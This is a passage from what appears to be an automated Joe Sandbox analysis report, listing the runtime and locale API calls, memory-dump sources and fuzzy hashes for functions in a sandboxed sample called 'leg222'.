                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                          • Opcode ID: 8631ae01d50ef071731077c24fde2e92ad36f99a2c600440034f8db8e702a2a6
                                                                                                                                                                                                                                          • Instruction ID: 11b4d88575870554bbe7890e963e5b6084160b5c8784cd64385fc4b331d9b5b5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8631ae01d50ef071731077c24fde2e92ad36f99a2c600440034f8db8e702a2a6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DF062363003045FDB145F759C85FBA7B95FB81768F1A442DF9458B690D6B19C42C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00AB3011: EnterCriticalSection.KERNEL32(?,?,00AB959F,?,00AD3DE0,00000008,00AB9763,?,?,?), ref: 00AB3020
                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00AB8A79,00000001,00AD3D80,0000000C,00AB8EE8,00000000), ref: 00AB8ABE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1272433827-0
                                                                                                                                                                                                                                          • Opcode ID: 3ad5d17429d1200e8eaaa3eab6a231d1e4bac777c72c94e59b607ca9291ad113
                                                                                                                                                                                                                                          • Instruction ID: 8c1c643c3b16e9460806fafb01d84b070ed8260b7c2107622ad691778f2be88d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ad5d17429d1200e8eaaa3eab6a231d1e4bac777c72c94e59b607ca9291ad113
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57F04972A44204EFDB00EF98E986B9D77F4FB48721F00861AF411EB2A2CBB95901CF40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: GetLastError.KERNEL32(?,?,00AAF745,00AD3A10,0000000C), ref: 00AB98CB
                                                                                                                                                                                                                                            • Part of subcall function 00AB98C7: SetLastError.KERNEL32(00000000), ref: 00AB996D
                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00AC251B,00000001,?,?,?,00AC2D86,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00AC25F9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                          • Opcode ID: 3188b5c69d56f6fa835c6b313bef2f700b4159161ffa757f549ee3ca9dc2693c
                                                                                                                                                                                                                                          • Instruction ID: 288804b3acd8a16b2bba52b0fe749dd83604efeb193c463868204a740ed5b1a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3188b5c69d56f6fa835c6b313bef2f700b4159161ffa757f549ee3ca9dc2693c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F0E53670020957CB049F75D859FAB7F94EFC1724F0B405DEA068B651C6759883C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00AB7F13,?,20001004,00000000,00000002,?,?,00AB7515), ref: 00AB9020
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                                                                          • Opcode ID: a89bac777dfb36a696730ec569dbe69b5e3a3c9dd4526b2d210c29b6ff642f52
                                                                                                                                                                                                                                          • Instruction ID: 67bf72a974ab6efbe45b28200ee9740046c58fa1e69d8a0314641f83a9c88a1b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a89bac777dfb36a696730ec569dbe69b5e3a3c9dd4526b2d210c29b6ff642f52
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46E01A7590022CBBCB226F61DC09EEE7E29EB44790F054111FA0965122CB318921AA91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0000B8A2,00AAAECA), ref: 00AAB89B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                          • Opcode ID: 7ccd09e5077e1de15263af62add2837dad836eb08c3dd8f7175be50fea48a6c1
                                                                                                                                                                                                                                          • Instruction ID: 64d6d7d06e0aa6db364cb0e386a7dbf25eaaf7541022fb6e51a4bc84ad106be2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ccd09e5077e1de15263af62add2837dad836eb08c3dd8f7175be50fea48a6c1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                          • Opcode ID: 13f05c9f17f38ee8f8802e4f235fdca3e5ed9529ed4a79d874a1687a5a77a791
                                                                                                                                                                                                                                          • Instruction ID: 23117f7d0d43a1d851762947b44099b28de08683b256dcdb2bdbf9fa0cf507b6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13f05c9f17f38ee8f8802e4f235fdca3e5ed9529ed4a79d874a1687a5a77a791
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7A02230320200CF8300CF33AE0CF0C3BE8BA802C030A8028A00AC20F0EF30808AAF02
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA4E9D
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA4EB7
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA4ED8
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA4F04
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA4F39
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA4F76
                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AA4FC7
                                                                                                                                                                                                                                          • __Getctype.LIBCPMT ref: 00AA4FDE
                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00AA4FF7
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA5010
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_GetctypeLocinfo::_Locinfo_ctorRegister
                                                                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                                                                          • API String ID: 1407599034-1405518554
                                                                                                                                                                                                                                          • Opcode ID: 46d3d47134d91a3b2a102e4f39f725e4350b0838ee94c1bc75625ddeab86c800
                                                                                                                                                                                                                                          • Instruction ID: d059c9555aee316fbcdee1cc93d88dab3df04285e31634d67cb8255098d97e7f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46d3d47134d91a3b2a102e4f39f725e4350b0838ee94c1bc75625ddeab86c800
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EB1F135A006009FCB20DF68C991BAEB7B1FF8A710F19425DE8599B3D1DB75AC05CB91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA545D
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA5477
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA5498
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA54C4
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA54F9
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA5536
                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AA5587
                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00AA55A6
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA55BF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Locinfo::_Locinfo_ctorRegister
                                                                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                                                                          • API String ID: 3434717313-1405518554
                                                                                                                                                                                                                                          • Opcode ID: 0d73a9a55aea75f0b0663639f2ce74a6784f65a4a99e57fcfe36014905c5fa78
                                                                                                                                                                                                                                          • Instruction ID: 4f430d5e23c603b0194ce414c81403a82937fb5555ded752ca1c1be52c883c28
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d73a9a55aea75f0b0663639f2ce74a6784f65a4a99e57fcfe36014905c5fa78
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6841F031A083408FC750DF24E990B5FB7F1EF86720F14095EE88987291EB75E909CB92
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA6520
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA653A
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA655B
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00AA658A
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA65F1
                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AA664E
                                                                                                                                                                                                                                          • __Getctype.LIBCPMT ref: 00AA6665
                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00AA66AA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_$Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegister
                                                                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                                                                          • API String ID: 2622896957-1405518554
                                                                                                                                                                                                                                          • Opcode ID: 3daf5714830e3b365e9d165119769dfe87bfa4671c348d6527f403bf3d6ba35c
                                                                                                                                                                                                                                          • Instruction ID: a4e6aa3be9b08ccf8aaad385e3f4ff589858d54f26b9485b37707db8a063a9c3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3daf5714830e3b365e9d165119769dfe87bfa4671c348d6527f403bf3d6ba35c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3851F4718087418FD321DF24CA41B6BB7F0BF96310F19495DE889972A2EB75E984CF92
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA6A31
                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AA6A86
                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00AA6BFE
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::_$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                          • String ID: ,$.$bad locale name$false$true
                                                                                                                                                                                                                                          • API String ID: 1995332507-3659324578
                                                                                                                                                                                                                                          • Opcode ID: e3e872f33de7b91479fca6dcff56667f8d644445cebbead8c2db23829a39cf39
                                                                                                                                                                                                                                          • Instruction ID: ed73b7b4c776df6002ca6da3731043b61348db9209e6ec02a24f2b520e016a08
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3e872f33de7b91479fca6dcff56667f8d644445cebbead8c2db23829a39cf39
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 635180B1808381AFD310DF64C941B9BB7E4BF99304F048A2EF58997291E774E548CBA3
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00AA6C62
                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AA6CB7
                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00AA6D81
                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00AA6D86
                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00AA6D8B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                          • String ID: bad locale name$false$true
                                                                                                                                                                                                                                          • API String ID: 164343898-1062449267
                                                                                                                                                                                                                                          • Opcode ID: d289b74b16e4bf846293a9e13412ff81d8b97208f81bde8e4865ef96db3fbb3c
                                                                                                                                                                                                                                          • Instruction ID: b52a7e9b06e8adc99af92a0a6cccf04b5b4f4063cc646236739e2b4c4ddc0979
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d289b74b16e4bf846293a9e13412ff81d8b97208f81bde8e4865ef96db3fbb3c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F41BF746083419FD720EF64CA4175BBBF4AF8A710F08482DF4998B2D2E7B5D509CBA2
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AAADD3
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00AAADE1
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00AAADF2
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00AAAE03
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                          • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 667068680-1247241052
                                                                                                                                                                                                                                          • Opcode ID: ec7003f8c768f98794cff52c4c515541bcc1d31dd6403b5a2ce2e0c0a104d596
                                                                                                                                                                                                                                          • Instruction ID: 2f0c23e7bf7292f0a49cd731077e969268a10edb8a00ab8da79597cb4954137b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec7003f8c768f98794cff52c4c515541bcc1d31dd6403b5a2ce2e0c0a104d596
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76E086355A5310FB8300AFB07C0EDA53AB4FA5939A7030526BC05D7260DFB000018BB1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00AAE6C7
                                                                                                                                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 00AAE7D5
                                                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 00AAE927
                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 00AAE942
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                          • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                          • Opcode ID: 6da6e455afddc00cb6d9d1e685a1144c8afc6175afd9c11b968e5f4906350d79
                                                                                                                                                                                                                                          • Instruction ID: 3ffeef2f50832402a09e4c92cb8941d129c7ccbb63818ae37aca5490c36f959a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6da6e455afddc00cb6d9d1e685a1144c8afc6175afd9c11b968e5f4906350d79
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87B17971800209EFCF29DFA4D9819AEBBB5FF1A310F14456AF8116B292D734EA51CF91
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2304487503.0000000000AA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304467854.0000000000AA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304517289.0000000000ACA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304602444.0000000000AD5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2304673417.0000000000BB8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_aa0000_leg222.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 0-3907804496
                                                                                                                                                                                                                                          • Opcode ID: 88f0aa005da311f2083cfa180818ea7bd70e594985b81e8d6a07ffc227acda7a
                                                                                                                                                                                                                                          • Instruction ID: c1e915a4a0d7363d7c9a127b43c35559b78ab4ead5e275c4c12b7901042c1e73
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88f0aa005da311f2083cfa180818ea7bd70e594985b81e8d6a07ffc227acda7a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55B10270A04249AFDB11DFA9C880BFDBBB9EF89304F144159E405AB293EB719D42CB61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(0090FB48,0090FB48,?,7FFFFFFF,?,00AC6C6A,0090FB48,0090FB48,?,0090FB48,?,?,?,?,0090FB48,?), ref: 00AC6A40
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00AC6AFB
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00AC6B8A
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00AC6BD5
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00AC6BDB
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00AC6C11
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00AC6C17
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00AC6C27
